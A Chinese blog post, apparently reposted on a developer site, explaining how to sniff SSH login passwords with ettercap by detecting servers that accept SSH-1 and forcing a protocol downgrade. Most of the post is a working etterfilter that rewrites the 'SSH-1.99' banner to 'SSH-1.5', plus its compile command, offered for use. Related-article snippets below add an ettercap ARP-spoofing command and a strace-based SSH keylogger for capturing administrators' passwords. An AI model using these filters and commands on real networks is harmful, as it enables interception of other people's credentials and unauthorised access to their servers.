使用ettercap嗅探ssh口令

最新推荐文章于 2022-11-16 19:27:33 发布
最新推荐文章于 2022-11-16 19:27:33 发布
阅读量3.5k 收藏
点赞数
文章标签: ssh filter search 服务器

* 作者: xi4oyu(http://www.pentestday.com)
* 转载请注明出处

通常情况下我们判断目标的ssh能否被嗅探可以使用nc来确定。具体方法为nc targetip 22。

如果返回的版本号为SSH-1.99就表示在sshd_config中protcol 为2,1。

但默认从网上下的ettercap是不能嗅探ssh1的密码的,即使被嗅探的服务器被配置成了protcol 2,1也一样。


花了一会研究了下filter的写法,写了个ssh将ssh-1.99降到ssh-1.5的filter

if (tcp.src ==22 && search(DATA.data,"SSH-1.99")){

replace("SSH-1.99","SSH-1.5");

}

保存为sh.filter,编译方式为Etterfilter sh.filter -o sh.ef

启动ettercap的时候加载这个filter,看看,是不是能嗅了?

呵呵

cnbird2008
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
et-phone-home:使用SSH隧道对OpenWRT IoT设备进行简单的远程控制
05-14
ET电话首页 使用SSH隧道对OpenWRT IoT设备进行简单的远程控制 管理物联网设备的最大问题实际上是与它们的连接,因为它们通常部署在本地网络防火墙后面。 ET Phone Home是一种使用SSH反向隧道绕过防火墙的解决方案,方法是每分钟“ ping”外部服务器,然后将设备的端口从防火墙内部转发到外部服务器。 该解决方案还提供了监视设备运行状况的基本方法。 该解决方案是为OpenWRT量身定制的,但是在其他基于Linux的平台(如Raspberry Pi,BeagleBone或Arduino Yun)上,几乎不需要修改就可以工作。 这个怎么运作 已配置SSH服务器,并为服务器上的每个设备创建了用户和主目录。 设备每分钟连接到服务器,并在设备的主目录中查找文件。 该服务器作为穷人的“收件箱”消息传递过程。 文件指示控制设备的意图,其中包含应转发的端口。 如果该文件存在,则设备将
有关SSH协议信息的内容整理
sjailjq的专栏
08-10 1157
Secure Shell(安全外壳协议,简称SSH)是一种加密的网络传输协议,可在不安全的网络中为网络服务提供安全的传输环境。SSH通过在网络中创建安全隧道来实现SSH客户端与服务器之间的连接。虽然任何网络服务都可以通过SSH实现安全传输,SSH最常见的用途是远程登录系统,人们通常利用SSH来传输命令行界面和远程执行命令。 为什么要使用SSH? 传统的网络服务程序,如:ftp、pop和te...
SSH 协议基础
Guixue
07-20 1万+
SSH的英文全称为Secure Shell,是IETF(Internet Engineering Task Force)的Network Working Group所制定的一族协议,其目的是要在非安全网络上提供安全的远程登录和其他安全网络服务。 我们可以简单理解为:Rlogin和Telnet等的替代方案。SSH使用场景如下图所示,具体请参考下文SSH的框架。  SSH 基本框架
Xshell通过ssh连接设备失败问题记录(Xshell设置问题)
liuya000的博客
05-31 3212
问题现象:通过Xshell ssh连接设备,连接失败,经确认设备ssh配置没问题,PC通过其它终端软件可以ssh登录设备只有Xshell不可以。 处理过程:开启Xshell 记录日志功能 连接信息如下 Connecting to xx.9.0.95:22... Connection established. To escape to local shell, press 'Ctrl+Alt+]'. [09:35:53] Version exchange initiated... [09:35:5.
SSH Keylogger密码抓取
The current road is different, love needs to distinguish between right and wrong
11-16 1100
SSH Keylogger终端切换用户记录用户输入的终端信息可获取密码主要利用strace系统调试工具获取ssh的读写连接的数据,以达到抓取管理员登陆其他机器的明文密码的作用。没有那么多天赋异禀,优秀的人总是努力地翻山越岭。
SSH协议
Java
10-14 902
SSH 目录 1 SSH简介 1 1.1 什么是SSH 1 1.2 SSH的产生背景 1 1.3 SSH的技术特点 1 2 SSH总体框架 2 2.1 传输层协议 2 2.2 认证层协议 3 2.3 连接层协议 3 3 SSH安全性 3 3.1 数据传输安全性 3 3.2 用户认证安全性 3 4 SSH协议过程 3 4.1 连接建立 3 4.2 协商版本 4 4...
n900使用ettercap嗅探局域网内数据流动
12-15
"n900使用ettercap嗅探局域网内数据流动" ettercap是一个强大的网络嗅探工具,能够嗅探局域网内的数据流动。下面是使用n900设备嗅探局域网内数据流动的知识点: 1. ettercap的安装和配置:ettercap是一个开源的...
mininet_sshmitm:这是使用Mininet和EttercapSSH中间人(MITM)攻击的示例
05-07
使用Mininet的SSH MITM攻击演示 介绍 在此演示中,我们将演示恶意攻击者如何通过称为ARP欺骗的方法窃听SSH客户端和SSH服务器之间的流量,从而成为中间人主机。 入门 此示例需要两个至关重要的软件,分别称为Mininet...
linux嗅探ettercap.doc
最新发布
01-09
Linux系统安全学习中, ettercap是一个重要的工具,它在网络安全领域被广泛用于网络嗅探和中间人攻击。本文主要探讨了ettercap的安装过程以及在Linux环境下的使用方法。 ettercap 07.3的安装首先需要依赖两个关键的...
ettercap-NG-0.7.3-win32 太网络局域网嗅探
09-02
ettercap-NG-0.7.3-win32是一款针对Windows平台的开源网络嗅探工具,主要用于局域网内的数据包捕获和分析。在网络安全领域,嗅探器是一种非常重要的工具,它允许用户查看网络上的通信流量,帮助检测潜在的安全问题、...
Ettercap使用说明
08-23
Ettercap使用说明,ssh安全协议较低版本存在一些缺陷容易被嗅探其中的密码等信息,比如ssh1.5,从ssh1.9开始逐步修复这些漏洞,但是,在ettercap的过滤器中包含有一个脚本用来对ssh的1.9版本降级到1.5版本,从而又容易嗅探其中的信息,它位于/usr/share/ettercap/目录下。内容如下:
思科SSH配置
热门推荐
junlan的博客
01-03 2万+
R1(config)#hostname R1 //配置ssh的时候路由器的名字不能为router R1(config)#aaa new-model //默认是no aaa new-model, 如果配置为aaa new-model,line vty就不需要配置login local R1(config)#ip domain-name cisco //SSH的关键字名就是hostnam...
SSH远程登录+内网穿透
qq_20611245的博客
07-06 7700
ssh远程
SSH V2的中间人攻击
cnbird's blog
08-30 7668
教学的387课程,转眼半年过去了,感谢各位的支持。 中间人攻击(Man-in-the-MiddleAttack,简称“MITM攻击”)中间人攻击很早就成为了黑客常用的一种古老的攻击手段,并且一直到今天还具有极大的扩展空间。 在网络安全方面,MITM攻击的使用是很广泛的,曾经猖獗一时的SMB会话劫持、DNS欺骗等技术都是典型的MITM攻击手段。在黑客技术越来越多的运用于以获取经济利益为目标的情况
ssh远程登录可能出现的问题以及解决办法
samuel
12-11 1万+
首先、确保server端的ssh服务是开的(service shhd start) 然后在client端输入: ssh usrname@serverip (远程登录) scp filename usrname@serverip:/URL (远程传输) 常出现的问题: 问题一 ssh登录的时候链接端口失败 提示(1): # ssh 192.1
交换机ssh版本信息可被获取_【交换机】交换机如何配置ssh管理
weixin_28746457的博客
12-29 1714
一、组网需求通过ssh功能远程登录管理设备二、配置步骤:1)全局开启SSH服务,并制定SSH的版本Ruijie>enableRuijie#configure terminalRuijie(config)#enable service ssh-server ------>开启SSH服务,默认关闭Ruijie(config)#ip ssh version 2...
SSH
07-17 176
SSH 创建的会话更安全。SSH 使用加密密钥发送数据,以免以明文方式发送用户名和密码。 设置 SSH 的步骤如下:(1) 设置主机名:Router(config)#hostname Todd(2) 设置域名(为生成加密密钥,必须有用户名和域名):Todd(config)#ip domain-name Lammle.com(3) 将用户名设置成支持 SSH 客户端接入:Todd(config)#u...
Linux下SSH命令使用方法详解
06-19 2583
1、查看SSH客户端版本有的时候需要确认一下SSH客户端及其相应的版本号。使用ssh -V命令可以得到版本号。需要注意的是,Linux一般自带的是OpenSSH: 下面的例子即表明该系统正在使用OpenSSH:$ ssh -V OpenSSH_3.9p1, OpenSSL 0.9.7a Feb 19 2003 AD: 1、查看SSH客户端版本 有的时候需要确认一下SSH客户端及其
SSH协议解析及wireshark抓包分析
chen1415886044的博客
07-11 2万+
ssh中文名称叫安全外壳协议,是一种加密的网络传输协议。SSH 在 TCP 和 UDP 中都被分配了端口 22。 但是,由于需要可靠的通信、正确的数据包排序等,该协议主要在 TCP 上运行。 为什么需要SSHSSH 和 telnet 之间的主要区别在于 SSH 提供完全加密和经过身份验证的会话。而telnet缺少安全的认证方式,而且传输过程采用TCP进行明文传输,存在很大的安全隐患。单纯提供telnet服务容易招致DoS、主机IP地址欺骗、路由欺骗等。所以在远程登陆上SSH替代telnet,提供更安全可
ettercap使用
09-16
1. 使用以下命令启动Ettercap,并将其配置为使用ARP欺骗技术攻击远程目标主机: ettercap -Tq -i eth0 /网关/ /目标主机/ -P remote_browser 2. 使用以下命令将Ettercap配置为使用ARP欺骗技术劫持整个内网: ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值